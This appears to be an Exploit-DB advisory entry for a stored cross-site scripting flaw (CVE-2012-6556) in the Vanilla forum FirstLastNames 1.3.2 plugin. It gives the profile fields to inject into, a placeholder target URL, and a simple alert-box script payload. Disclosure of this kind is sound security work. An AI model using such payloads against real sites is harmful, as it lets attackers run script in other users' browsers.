[] NeoSense

Vanilla FirstLastNames 1.3.2 Plugin - Persistent Cross-Site Scripting

Author: Henry Hoggard
type: webapps
platform: php
port: 
date_added: 2012-05-21 
date_updated: 2012-05-21 
verified: 1 
codes: OSVDB-82081;CVE-2012-6556 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comPFINMZ50IA7R.zip

# Title: Vanilla FirstLastNames 1.3.2 Plugin Persistant XSS Vulnerability
# Date: 18/5/12
# Author: Henry Hoggard
# Author URL: henryhoggard.co.uk
# Author Twitter: @henryhoggard
# Software: Vanilla Version 2.0.18.4 + FirstLastNames 1.3.2

http://vanillaforums.org/addon/firstlastnames-plugin

# http://vanillaforums.org
#############################################################

On Edit your account enter your XSS String in either the first name or last name field.
Then if a user visits your page the XSS will execute.

http://target.tld/index.php?p=/profile/myprofile/1/user

XSS:
<script>alert('x')</script>

#############################################################

http://henryhoggard.co.uk